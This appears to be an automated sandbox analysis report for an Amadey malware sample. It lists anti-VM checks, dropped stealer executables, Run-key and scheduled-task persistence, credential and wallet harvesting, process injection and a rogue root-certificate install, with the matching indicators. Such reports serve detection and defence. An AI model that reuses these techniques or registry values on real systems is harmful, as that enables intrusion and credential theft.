amadey | f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ba0113578b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ba0113578b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ba0113578b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url	cmd.exe

Executes dropped EXE 41 IoCs

pid	Process
3228	axplong.exe
4420	gold.exe
4504	crypteda.exe
704	vVRF3QNBae.exe
2720	omORvZzPVW.exe
2380	Nework.exe
2056	Hkbsse.exe
3248	stealc_default2.exe
544	axplong.exe
2856	Hkbsse.exe
4980	SÐµtup.exe
4596	needmoney.exe
4080	penis.exe
688	svchost015.exe
3392	bundle.exe
1484	acentric.exe
1444	JLumma.exe
1244	JUmer.exe
956	contorax.exe
3424	winmsbt.exe
2672	3546345.exe
816	crypteda.exe
4080	rEA2qvRRsI.exe
3012	hu01pHYE3x.exe
232	exbuild.exe
1804	service123.exe
4336	ba0113578b.exe
2216	BowExpert.exe
1128	kitty.exe
3248	acentric.exe
2268	Intake.pif
3784	vlst.exe
2568	freedom.exe
672	appgate15.exe
3408	service123.exe
3552	axplong.exe
4784	Hkbsse.exe
4016	RegAsm.exe
4164	service123.exe
4236	axplong.exe
1800	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	ba0113578b.exe
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Wine	axplong.exe

Loads dropped DLL 5 IoCs

pid	Process
3248	stealc_default2.exe
3248	stealc_default2.exe
1804	service123.exe
3408	service123.exe
4164	service123.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update"	acentric.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update"	acentric.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\""	winmsbt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	pastebin.com
33	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ipinfo.io
57	api64.ipify.org
69	api64.ipify.org
71	ipinfo.io

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3364	tasklist.exe
2780	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
3228	axplong.exe
544	axplong.exe
4336	ba0113578b.exe
3552	axplong.exe
4236	axplong.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 4420 set thread context of 1596	4420	gold.exe	84
PID 4504 set thread context of 2852	4504	crypteda.exe	87
PID 4596 set thread context of 688	4596	needmoney.exe	101
PID 1444 set thread context of 1916	1444	JLumma.exe	106
PID 1484 set thread context of 3752	1484	acentric.exe	108
PID 816 set thread context of 436	816	crypteda.exe	117
PID 672 set thread context of 3144	672	appgate15.exe	153
PID 3248 set thread context of 1964	3248	acentric.exe	157

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
File created	C:\Windows\Tasks\Hkbsse.job	Nework.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2352	1128	WerFault.exe	129

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hu01pHYE3x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba0113578b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BowExpert.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypteda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	penis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acentric.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gold.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nework.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	appgate15.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JUmer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypteda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vVRF3QNBae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JLumma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kitty.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acentric.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	freedom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	omORvZzPVW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	needmoney.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bundle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SÐµtup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3546345.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rEA2qvRRsI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Intake.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Explorer.exe

Checks processor information in registry 2 TTPs 27 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	freedom.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	freedom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SÐµtup.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	SÐµtup.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	JUmer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	freedom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	freedom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	freedom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	freedom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	JUmer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	freedom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	freedom.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5056	schtasks.exe
1568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
3228	axplong.exe
3228	axplong.exe
3248	stealc_default2.exe
3248	stealc_default2.exe
704	vVRF3QNBae.exe
2720	omORvZzPVW.exe
2720	omORvZzPVW.exe
2720	omORvZzPVW.exe
2720	omORvZzPVW.exe
2720	omORvZzPVW.exe
3248	stealc_default2.exe
3248	stealc_default2.exe
544	axplong.exe
544	axplong.exe
4080	penis.exe
3392	bundle.exe
3392	bundle.exe
3392	bundle.exe
3392	bundle.exe
3392	bundle.exe
1484	acentric.exe
1484	acentric.exe
4336	ba0113578b.exe
4336	ba0113578b.exe
4080	rEA2qvRRsI.exe
3012	hu01pHYE3x.exe
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeDebugPrivilege	704	vVRF3QNBae.exe
Token: SeBackupPrivilege	704	vVRF3QNBae.exe
Token: SeSecurityPrivilege	704	vVRF3QNBae.exe
Token: SeSecurityPrivilege	704	vVRF3QNBae.exe
Token: SeSecurityPrivilege	704	vVRF3QNBae.exe
Token: SeSecurityPrivilege	704	vVRF3QNBae.exe
Token: SeDebugPrivilege	2720	omORvZzPVW.exe
Token: SeDebugPrivilege	4080	penis.exe
Token: SeBackupPrivilege	4080	penis.exe
Token: SeSecurityPrivilege	4080	penis.exe
Token: SeSecurityPrivilege	4080	penis.exe
Token: SeSecurityPrivilege	4080	penis.exe
Token: SeSecurityPrivilege	4080	penis.exe
Token: SeDebugPrivilege	3392	bundle.exe
Token: SeDebugPrivilege	1484	acentric.exe
Token: SeDebugPrivilege	956	contorax.exe
Token: SeDebugPrivilege	3424	winmsbt.exe
Token: SeDebugPrivilege	4080	rEA2qvRRsI.exe
Token: SeBackupPrivilege	4080	rEA2qvRRsI.exe
Token: SeSecurityPrivilege	4080	rEA2qvRRsI.exe
Token: SeSecurityPrivilege	4080	rEA2qvRRsI.exe
Token: SeSecurityPrivilege	4080	rEA2qvRRsI.exe
Token: SeSecurityPrivilege	4080	rEA2qvRRsI.exe
Token: SeDebugPrivilege	3012	hu01pHYE3x.exe
Token: SeDebugPrivilege	3364	tasklist.exe
Token: SeDebugPrivilege	2780	tasklist.exe
Token: SeDebugPrivilege	3784	vlst.exe
Token: SeBackupPrivilege	3784	vlst.exe
Token: SeSecurityPrivilege	3784	vlst.exe
Token: SeSecurityPrivilege	3784	vlst.exe
Token: SeSecurityPrivilege	3784	vlst.exe
Token: SeSecurityPrivilege	3784	vlst.exe
Token: SeDebugPrivilege	672	appgate15.exe
Token: SeDebugPrivilege	3248	acentric.exe
Token: SeDebugPrivilege	4016	RegAsm.exe
Token: SeBackupPrivilege	4016	RegAsm.exe
Token: SeSecurityPrivilege	4016	RegAsm.exe
Token: SeSecurityPrivilege	4016	RegAsm.exe
Token: SeSecurityPrivilege	4016	RegAsm.exe
Token: SeSecurityPrivilege	4016	RegAsm.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
956	contorax.exe
3424	winmsbt.exe
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
3424	winmsbt.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
956	contorax.exe
3424	winmsbt.exe
2268	Intake.pif
2268	Intake.pif
2268	Intake.pif
3424	winmsbt.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2388 wrote to memory of 3228	2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe	81
PID 2388 wrote to memory of 3228	2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe	81
PID 2388 wrote to memory of 3228	2388	f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe	81
PID 3228 wrote to memory of 4420	3228	axplong.exe	82
PID 3228 wrote to memory of 4420	3228	axplong.exe	82
PID 3228 wrote to memory of 4420	3228	axplong.exe	82
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 4420 wrote to memory of 1596	4420	gold.exe	84
PID 3228 wrote to memory of 4504	3228	axplong.exe	86
PID 3228 wrote to memory of 4504	3228	axplong.exe	86
PID 3228 wrote to memory of 4504	3228	axplong.exe	86
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 4504 wrote to memory of 2852	4504	crypteda.exe	87
PID 2852 wrote to memory of 704	2852	RegAsm.exe	88
PID 2852 wrote to memory of 704	2852	RegAsm.exe	88
PID 2852 wrote to memory of 704	2852	RegAsm.exe	88
PID 2852 wrote to memory of 2720	2852	RegAsm.exe	90
PID 2852 wrote to memory of 2720	2852	RegAsm.exe	90
PID 2852 wrote to memory of 2720	2852	RegAsm.exe	90
PID 3228 wrote to memory of 2380	3228	axplong.exe	91
PID 3228 wrote to memory of 2380	3228	axplong.exe	91
PID 3228 wrote to memory of 2380	3228	axplong.exe	91
PID 2380 wrote to memory of 2056	2380	Nework.exe	92
PID 2380 wrote to memory of 2056	2380	Nework.exe	92
PID 2380 wrote to memory of 2056	2380	Nework.exe	92
PID 3228 wrote to memory of 3248	3228	axplong.exe	93
PID 3228 wrote to memory of 3248	3228	axplong.exe	93
PID 3228 wrote to memory of 3248	3228	axplong.exe	93
PID 3228 wrote to memory of 4980	3228	axplong.exe	97
PID 3228 wrote to memory of 4980	3228	axplong.exe	97
PID 3228 wrote to memory of 4980	3228	axplong.exe	97
PID 3228 wrote to memory of 4596	3228	axplong.exe	98
PID 3228 wrote to memory of 4596	3228	axplong.exe	98
PID 3228 wrote to memory of 4596	3228	axplong.exe	98
PID 3228 wrote to memory of 4080	3228	axplong.exe	99
PID 3228 wrote to memory of 4080	3228	axplong.exe	99
PID 3228 wrote to memory of 4080	3228	axplong.exe	99
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 4596 wrote to memory of 688	4596	needmoney.exe	101
PID 3228 wrote to memory of 3392	3228	axplong.exe	102
PID 3228 wrote to memory of 3392	3228	axplong.exe	102
PID 3228 wrote to memory of 3392	3228	axplong.exe	102
PID 3228 wrote to memory of 1484	3228	axplong.exe	104
PID 3228 wrote to memory of 1484	3228	axplong.exe	104

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3300
- C:\Users\Admin\AppData\Local\Temp\f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe
  "C:\Users\Admin\AppData\Local\Temp\f942af4f1b60a5e2a50b93cbcc0de895af2290be50bce1e1dd43bc2be0203c72.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3228
  - - C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
      "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:1596
